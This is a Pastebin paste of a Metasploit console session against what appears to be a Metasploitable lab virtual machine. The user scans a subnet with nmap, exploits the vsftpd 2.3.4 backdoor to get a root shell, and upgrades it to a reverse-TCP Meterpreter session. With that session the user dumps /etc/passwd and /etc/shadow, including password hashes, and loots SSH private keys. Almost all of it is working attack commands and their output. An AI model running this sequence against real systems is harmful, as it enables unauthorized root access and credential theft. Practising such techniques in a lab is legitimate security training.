API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 21st, 2017
876
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.75 KB | None | 0 0
raw download clone embed print report
  1. root@kali:~# service postgresql start
  2. root@kali:~# sudo msfdb init
  3. Creating database user 'msf'
  4. Enter password for new role:
  5. Enter it again:
  6. Creating databases 'msf' and 'msf_test'
  7. Creating configuration file in /usr/share/metasploit-framework/config/database.yml
  8. Creating initial database schema
  9. root@kali:~# msfconsole
  10.  
  11.  
  12. Metasploit Park, System Security Interface
  13. Version 4.0.5, Alpha E
  14. Ready...
  15. > access security
  16. access: PERMISSION DENIED.
  17. > access security grid
  18. access: PERMISSION DENIED.
  19. > access main security grid
  20. access: PERMISSION DENIED....and...
  21. YOU DIDN'T SAY THE MAGIC WORD!
  22. YOU DIDN'T SAY THE MAGIC WORD!
  23. YOU DIDN'T SAY THE MAGIC WORD!
  24. YOU DIDN'T SAY THE MAGIC WORD!
  25. YOU DIDN'T SAY THE MAGIC WORD!
  26. YOU DIDN'T SAY THE MAGIC WORD!
  27. YOU DIDN'T SAY THE MAGIC WORD!
  28.  
  29.  
  30. =[ metasploit v4.16.6-dev ]
  31. + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
  32. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  33. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  34.  
  35. msf > db_status
  36. [*] postgresql connected to msf
  37. msf > show workspace
  38. [-] Invalid parameter "workspace", use "show -h" for more information
  39. msf > show -h
  40. [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, info, options
  41. [*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
  42. msf > workspace
  43. * default
  44. msf > workspace meta
  45. [-] Workspace not found: meta
  46. msf > workspace -a meta
  47. [*] Added workspace: meta
  48. msf > workspace meta
  49. [*] Workspace: meta
  50. msf > db_nmap
  51. [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
  52. msf > db_nmap --save
  53. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:58 CET
  54. [*] Nmap: 'WARNING: No targets were specified, so 0 hosts scanned.'
  55. [*] Nmap: Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
  56. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1sonodp.xml
  57. msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
  58. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:59 CET
  59. [*] Nmap: Nmap scan report for 10.0.2.1
  60. [*] Nmap: Host is up (-0.20s latency).
  61. [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
  62. [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
  63. [*] Nmap: Nmap scan report for 10.0.2.2
  64. [*] Nmap: Host is up (0.00038s latency).
  65. [*] Nmap: Not shown: 47 closed ports
  66. [*] Nmap: PORT STATE SERVICE
  67. [*] Nmap: 21/tcp open ftp
  68. [*] Nmap: 22/tcp open ssh
  69. [*] Nmap: 23/tcp open telnet
  70. [*] Nmap: 25/tcp open smtp
  71. [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
  72. [*] Nmap: Nmap scan report for 10.0.2.3
  73. [*] Nmap: Host is up (0.000071s latency).
  74. [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
  75. [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.33 seconds
  76. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1t23job.xml
  77. msf > services -S ftp [10.0.2.2]
  78. [-] Invalid host parameter, [10.0.2.2].
  79. msf > services -S ftp 10.0.2.2
  80.  
  81. Services
  82. ========
  83.  
  84. host port proto name state info
  85. ---- ---- ----- ---- ----- ----
  86. 10.0.2.2 21 tcp ftp open
  87.  
  88. msf > use
  89. Usage: use module_name
  90.  
  91. The use command is used to interact with a module of a given name.
  92.  
  93. msf > use exploit
  94. [-] Failed to load module: exploit
  95. msf > use exploit/
  96. Display all 1682 possibilities? (y or n)
  97. msf > use exploit/unix/ftp/
  98. use exploit/unix/ftp/proftpd_133c_backdoor
  99. use exploit/unix/ftp/proftpd_modcopy_exec
  100. use exploit/unix/ftp/vsftpd_234_backdoor
  101. msf > use exploit/unix/ftp/vsftpd_234_backdoor
  102. msf exploit(vsftpd_234_backdoor) > show targets
  103.  
  104. Exploit targets:
  105.  
  106. Id Name
  107. -- ----
  108. 0 Automatic
  109.  
  110.  
  111. msf exploit(vsftpd_234_backdoor) > cd..
  112. [-] Unknown command: cd...
  113. msf exploit(vsftpd_234_backdoor) > exit
  114. root@kali:~# msfconsole
  115.  
  116.  
  117. _---------.
  118. .' ####### ;."
  119. .---,. ;@ @@`; .---,..
  120. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
  121. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
  122. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
  123. "--'.@@@ -.@ @ ,'- .'--"
  124. ".@' ; @ @ `. ;'
  125. |@@@@ @@@ @ .
  126. ' @@@ @@ @@ ,
  127. `.@@@@ @@ .
  128. ',@@ @ ; _____________
  129. ( 3 C ) /|___ / Metasploit! \
  130. ;@'. __*__,." \|--- \_____________/
  131. '(.,...."/
  132.  
  133.  
  134. =[ metasploit v4.16.6-dev ]
  135. + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
  136. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  137. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  138.  
  139. msf > db_status
  140. [*] postgresql connected to msf
  141. msf > hosts
  142.  
  143. Hosts
  144. =====
  145.  
  146. address mac name os_name os_flavor os_sp purpose info comments
  147. ------- --- ---- ------- --------- ----- ------- ---- --------
  148.  
  149. msf > services -S ftp 10.0.2.2 --save
  150. [-] Invalid host parameter, --save.
  151. msf > db_nmap
  152. [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
  153. msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
  154. [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 15:07 CET
  155. [*] Nmap: Nmap scan report for 10.0.2.1
  156. [*] Nmap: Host is up (-0.20s latency).
  157. [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
  158. [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
  159. [*] Nmap: Nmap scan report for 10.0.2.2
  160. [*] Nmap: Host is up (0.00035s latency).
  161. [*] Nmap: Not shown: 47 closed ports
  162. [*] Nmap: PORT STATE SERVICE
  163. [*] Nmap: 21/tcp open ftp
  164. [*] Nmap: 22/tcp open ssh
  165. [*] Nmap: 23/tcp open telnet
  166. [*] Nmap: 25/tcp open smtp
  167. [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
  168. [*] Nmap: Nmap scan report for 10.0.2.3
  169. [*] Nmap: Host is up (0.000084s latency).
  170. [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
  171. [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.47 seconds
  172. [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1913-mharu5.xml
  173. msf > hosts
  174.  
  175. Hosts
  176. =====
  177.  
  178. address mac name os_name os_flavor os_sp purpose info comments
  179. ------- --- ---- ------- --------- ----- ------- ---- --------
  180. 10.0.2.2 08:00:27:21:d6:69 Unknown device
  181.  
  182. msf > services
  183.  
  184. Services
  185. ========
  186.  
  187. host port proto name state info
  188. ---- ---- ----- ---- ----- ----
  189. 10.0.2.2 21 tcp ftp open
  190. 10.0.2.2 22 tcp ssh open
  191. 10.0.2.2 23 tcp telnet open
  192. 10.0.2.2 25 tcp smtp open
  193.  
  194. msf > services -S ftp 10.0.2.2
  195.  
  196. Services
  197. ========
  198.  
  199. host port proto name state info
  200. ---- ---- ----- ---- ----- ----
  201. 10.0.2.2 21 tcp ftp open
  202.  
  203. msf > use exploit/unix/ftp/vsftpd_234_backdoor
  204. msf exploit(vsftpd_234_backdoor) > show targets
  205.  
  206. Exploit targets:
  207.  
  208. Id Name
  209. -- ----
  210. 0 Automatic
  211.  
  212.  
  213. msf exploit(vsftpd_234_backdoor) > set rhost
  214. [-] Unknown variable
  215. Usage: set [option] [value]
  216.  
  217. Set the given option to value. If value is omitted, print the current value.
  218. If both are omitted, print options that are currently set.
  219.  
  220. If run from a module context, this will set the value in the module's
  221. datastore. Use -g to operate on the global datastore
  222.  
  223. msf exploit(vsftpd_234_backdoor) > set rhost 10.0.2.2
  224. rhost => 10.0.2.2
  225. msf exploit(vsftpd_234_backdoor) > options
  226.  
  227. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  228.  
  229. Name Current Setting Required Description
  230. ---- --------------- -------- -----------
  231. RHOST 10.0.2.2 yes The target address
  232. RPORT 21 yes The target port (TCP)
  233.  
  234.  
  235. Exploit target:
  236.  
  237. Id Name
  238. -- ----
  239. 0 Automatic
  240.  
  241.  
  242. msf exploit(vsftpd_234_backdoor) > check
  243. [*] 10.0.2.2:21 This module does not support check.
  244. msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/
  245. info exploit/unix/ftp/proftpd_133c_backdoor
  246. info exploit/unix/ftp/proftpd_modcopy_exec
  247. info exploit/unix/ftp/vsftpd_234_backdoor
  248. msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor
  249.  
  250. Name: VSFTPD v2.3.4 Backdoor Command Execution
  251. Module: exploit/unix/ftp/vsftpd_234_backdoor
  252. Platform: Unix
  253. Privileged: Yes
  254. License: Metasploit Framework License (BSD)
  255. Rank: Excellent
  256. Disclosed: 2011-07-03
  257.  
  258. Provided by:
  259. hdm <x@hdm.io>
  260. MC <mc@metasploit.com>
  261.  
  262. Available targets:
  263. Id Name
  264. -- ----
  265. 0 Automatic
  266.  
  267. Basic options:
  268. Name Current Setting Required Description
  269. ---- --------------- -------- -----------
  270. RHOST yes The target address
  271. RPORT 21 yes The target port (TCP)
  272.  
  273. Payload information:
  274. Space: 2000
  275. Avoid: 0 characters
  276.  
  277. Description:
  278. This module exploits a malicious backdoor that was added to the
  279. VSFTPD download archive. This backdoor was introduced into the
  280. vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
  281. according to the most recent information available. This backdoor
  282. was removed on July 3rd 2011.
  283.  
  284. References:
  285. OSVDB (73573)
  286. http://pastebin.com/AetT9sS5
  287. http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
  288.  
  289. msf exploit(vsftpd_234_backdoor) > show payloads
  290.  
  291. Compatible Payloads
  292. ===================
  293.  
  294. Name Disclosure Date Rank Description
  295. ---- --------------- ---- -----------
  296. cmd/unix/interact normal Unix Command, Interact with Established Connection
  297.  
  298. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
  299. payload => cmd/unix/interact
  300. msf exploit(vsftpd_234_backdoor) > show options
  301.  
  302. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  303.  
  304. Name Current Setting Required Description
  305. ---- --------------- -------- -----------
  306. RHOST 10.0.2.2 yes The target address
  307. RPORT 21 yes The target port (TCP)
  308.  
  309.  
  310. Payload options (cmd/unix/interact):
  311.  
  312. Name Current Setting Required Description
  313. ---- --------------- -------- -----------
  314.  
  315.  
  316. Exploit target:
  317.  
  318. Id Name
  319. -- ----
  320. 0 Automatic
  321.  
  322.  
  323. msf exploit(vsftpd_234_backdoor) > exploit
  324.  
  325. [*] 10.0.2.2:21 - Banner: 220 (vsFTPd 2.3.4)
  326. [*] 10.0.2.2:21 - USER: 331 Please specify the password.
  327. [+] 10.0.2.2:21 - Backdoor service has been spawned, handling...
  328. [+] 10.0.2.2:21 - UID: uid=0(root) gid=0(root)
  329. [*] Found shell.
  330. [*] Command shell session 1 opened (10.0.2.3:42357 -> 10.0.2.2:6200) at 2017-11-21 15:18:50 +0100
  331.  
  332. uname -a
  333. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  334. ^Z
  335. Background session 1? [y/N] y
  336. msf exploit(vsftpd_234_backdoor) > sessions
  337.  
  338. Active sessions
  339. ===============
  340.  
  341. Id Type Information Connection
  342. -- ---- ----------- ----------
  343. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  344.  
  345. msf exploit(vsftpd_234_backdoor) > post/multi/manage/shell_to_meterpreter
  346. [-] Unknown command: post/multi/manage/shell_to_meterpreter.
  347. msf exploit(vsftpd_234_backdoor) > postexploitation post/multi/manage/shell_to_meterpreter
  348. [-] Unknown command: postexploitation.
  349. msf exploit(vsftpd_234_backdoor) > run post/multi/manage/shell_to_meterpreter
  350. [*] 10.0.2.2:21 - The port used by the backdoor bind listener is already open
  351. [-] 10.0.2.2:21 - The service on port 6200 does not appear to be a shell
  352. [*] Exploit completed, but no session was created.
  353. msf exploit(vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpretermsf post(shell_to_meterpreter) > show options
  354.  
  355. Module options (post/multi/manage/shell_to_meterpreter):
  356.  
  357. Name Current Setting Required Description
  358. ---- --------------- -------- -----------
  359. HANDLER true yes Start an exploit/multi/handler to receive the connection
  360. LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
  361. LPORT 4433 yes Port for payload to connect to.
  362. SESSION yes The session to run this module on.
  363.  
  364. msf post(shell_to_meterpreter) > sessions
  365.  
  366. Active sessions
  367. ===============
  368.  
  369. Id Type Information Connection
  370. -- ---- ----------- ----------
  371. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  372.  
  373. msf post(shell_to_meterpreter) > set session 1
  374. session => 1
  375. msf post(shell_to_meterpreter) > show options
  376.  
  377. Module options (post/multi/manage/shell_to_meterpreter):
  378.  
  379. Name Current Setting Required Description
  380. ---- --------------- -------- -----------
  381. HANDLER true yes Start an exploit/multi/handler to receive the connection
  382. LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
  383. LPORT 4433 yes Port for payload to connect to.
  384. SESSION 1 yes The session to run this module on.
  385.  
  386. msf post(shell_to_meterpreter) > run postexploitation
  387.  
  388. [*] Upgrading session ID: 1
  389. [*] Starting exploit/multi/handler
  390. [*] Started reverse TCP handler on 10.0.2.3:4433
  391. [*] Sending stage (826872 bytes) to 10.0.2.2
  392. [*] Meterpreter session 2 opened (10.0.2.3:4433 -> 10.0.2.2:46390) at 2017-11-21 15:29:00 +0100
  393. [*] Command stager progress: 100.00% (736/736 bytes)
  394. [*] Post module execution completed
  395. msf post(shell_to_meterpreter) > sessions
  396.  
  397. Active sessions
  398. ===============
  399.  
  400. Id Type Information Connection
  401. -- ---- ----------- ----------
  402. 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
  403. 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain 10.0.2.3:4433 -> 10.0.2.2:46390 (10.0.2.2)
  404.  
  405. msf post(shell_to_meterpreter) > sessions -i 2
  406. [*] Starting interaction with 2...
  407.  
  408. meterpreter > sysinfo
  409. Computer : metasploitable.localdomain
  410. OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
  411. Architecture : i686
  412. Meterpreter : x86/linux
  413. meterpreter > cat /etc/passwd
  414. root:x:0:0:root:/root:/bin/bash
  415. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  416. bin:x:2:2:bin:/bin:/bin/sh
  417. sys:x:3:3:sys:/dev:/bin/sh
  418. sync:x:4:65534:sync:/bin:/bin/sync
  419. games:x:5:60:games:/usr/games:/bin/sh
  420. man:x:6:12:man:/var/cache/man:/bin/sh
  421. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  422. mail:x:8:8:mail:/var/mail:/bin/sh
  423. news:x:9:9:news:/var/spool/news:/bin/sh
  424. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  425. proxy:x:13:13:proxy:/bin:/bin/sh
  426. www-data:x:33:33:www-data:/var/www:/bin/sh
  427. backup:x:34:34:backup:/var/backups:/bin/sh
  428. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  429. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  430. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  431. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  432. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  433. dhcp:x:101:102::/nonexistent:/bin/false
  434. syslog:x:102:103::/home/syslog:/bin/false
  435. klog:x:103:104::/home/klog:/bin/false
  436. sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  437. msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
  438. bind:x:105:113::/var/cache/bind:/bin/false
  439. postfix:x:106:115::/var/spool/postfix:/bin/false
  440. ftp:x:107:65534::/home/ftp:/bin/false
  441. postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  442. mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
  443. tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
  444. distccd:x:111:65534::/:/bin/false
  445. user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
  446. service:x:1002:1002:,,,:/home/service:/bin/bash
  447. telnetd:x:112:120::/nonexistent:/bin/false
  448. proftpd:x:113:65534::/var/run/proftpd:/bin/false
  449. statd:x:114:65534::/var/lib/nfs:/bin/false
  450. meterpreter > cat /etc/passwd
  451. root:x:0:0:root:/root:/bin/bash
  452. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  453. bin:x:2:2:bin:/bin:/bin/sh
  454. sys:x:3:3:sys:/dev:/bin/sh
  455. sync:x:4:65534:sync:/bin:/bin/sync
  456. games:x:5:60:games:/usr/games:/bin/sh
  457. man:x:6:12:man:/var/cache/man:/bin/sh
  458. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  459. mail:x:8:8:mail:/var/mail:/bin/sh
  460. news:x:9:9:news:/var/spool/news:/bin/sh
  461. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  462. proxy:x:13:13:proxy:/bin:/bin/sh
  463. www-data:x:33:33:www-data:/var/www:/bin/sh
  464. backup:x:34:34:backup:/var/backups:/bin/sh
  465. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  466. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  467. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  468. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  469. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  470. dhcp:x:101:102::/nonexistent:/bin/false
  471. syslog:x:102:103::/home/syslog:/bin/false
  472. klog:x:103:104::/home/klog:/bin/false
  473. sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  474. msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
  475. bind:x:105:113::/var/cache/bind:/bin/false
  476. postfix:x:106:115::/var/spool/postfix:/bin/false
  477. ftp:x:107:65534::/home/ftp:/bin/false
  478. postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  479. mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
  480. tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
  481. distccd:x:111:65534::/:/bin/false
  482. user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
  483. service:x:1002:1002:,,,:/home/service:/bin/bash
  484. telnetd:x:112:120::/nonexistent:/bin/false
  485. proftpd:x:113:65534::/var/run/proftpd:/bin/false
  486. statd:x:114:65534::/var/lib/nfs:/bin/false
  487. meterpreter > cat /etc/shadow
  488. root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
  489. daemon:*:14684:0:99999:7:::
  490. bin:*:14684:0:99999:7:::
  491. sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
  492. sync:*:14684:0:99999:7:::
  493. games:*:14684:0:99999:7:::
  494. man:*:14684:0:99999:7:::
  495. lp:*:14684:0:99999:7:::
  496. mail:*:14684:0:99999:7:::
  497. news:*:14684:0:99999:7:::
  498. uucp:*:14684:0:99999:7:::
  499. proxy:*:14684:0:99999:7:::
  500. www-data:*:14684:0:99999:7:::
  501. backup:*:14684:0:99999:7:::
  502. list:*:14684:0:99999:7:::
  503. irc:*:14684:0:99999:7:::
  504. gnats:*:14684:0:99999:7:::
  505. nobody:*:14684:0:99999:7:::
  506. libuuid:!:14684:0:99999:7:::
  507. dhcp:*:14684:0:99999:7:::
  508. syslog:*:14684:0:99999:7:::
  509. klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
  510. sshd:*:14684:0:99999:7:::
  511. msfadmin:$1$hnf7AqmR$ESi6MmmnGxZQ2Xk5N2xSq0:17487:0:99999:7:::
  512. bind:*:14685:0:99999:7:::
  513. postfix:*:14685:0:99999:7:::
  514. ftp:*:14685:0:99999:7:::
  515. postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
  516. mysql:!:14685:0:99999:7:::
  517. tomcat55:*:14691:0:99999:7:::
  518. distccd:*:14698:0:99999:7:::
  519. user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
  520. service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
  521. telnetd:*:14715:0:99999:7:::
  522. proftpd:!:14727:0:99999:7:::
  523. statd:*:15474:0:99999:7:::
  524. meterpreter >
  525. Background session 2? [y/N]
  526. msf post(shell_to_meterpreter) > use post/multi/gather/ssh_creds
  527. msf post(ssh_creds) > options
  528.  
  529. Module options (post/multi/gather/ssh_creds):
  530.  
  531. Name Current Setting Required Description
  532. ---- --------------- -------- -----------
  533. SESSION yes The session to run this module on.
  534.  
  535. msf post(ssh_creds) > session 1
  536. [-] Unknown command: session.
  537. msf post(ssh_creds) > set session 1
  538. session => 1
  539. msf post(ssh_creds) > session 1
  540. [-] Unknown command: session.
  541. msf post(ssh_creds) > set session 1
  542. session => 1
  543. msf post(ssh_creds) > options
  544.  
  545. Module options (post/multi/gather/ssh_creds):
  546.  
  547. Name Current Setting Required Description
  548. ---- --------------- -------- -----------
  549. SESSION 1 yes The session to run this module on.
  550.  
  551. msf post(ssh_creds) > run postexploitation
  552.  
  553. [*] Finding .ssh directories
  554. [*] Looting 3 directories
  555. [+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20171121153305_default_10.0.2.2_ssh.authorized_k_467319.txt
  556. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  557. [+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa_189943.txt
  558. [+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa.pub_614578.txt
  559. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  560. [+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa_183298.txt
  561. [+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa.pub_979685.txt
  562. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  563. [+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.authorized_k_630265.txt
  564. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  565. [+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.known_hosts_814874.txt
  566. [-] Could not load SSH Key: Neither PUB key nor PRIV key
  567. [*] Post module execution completed
  568. msf post(ssh_creds) > creds
  569. Credentials
  570. ===========
  571.  
  572. host origin service public private realm private_type
  573. ---- ------ ------- ------ ------- ----- ------------
  574. msfadmin 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a SSH key
  575. user 70:ff:0f:ff:a3:8e:39:18:d7:30:c1:30:02:bc:20:3c SSH key
  576.  
  577. msf post(ssh_creds) > exit
  578. [*] You have active sessions open, to exit anyway type "exit -y"
  579. msf post(ssh_creds) > session -k 1
  580. [-] Unknown command: session.
  581. msf post(ssh_creds) > sessions -k 1
  582. [*] Killing the following session(s): 1
  583. [*] Killing session 1
  584. [*] 10.0.2.2 - Command shell session 1 closed.
  585. msf post(ssh_creds) > sessions -k 2
  586. [*] Killing the following session(s): 2
  587. [*] Killing session 2
  588. [*] 10.0.2.2 - Meterpreter session 2 closed.
  589. msf post(ssh_creds) > exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!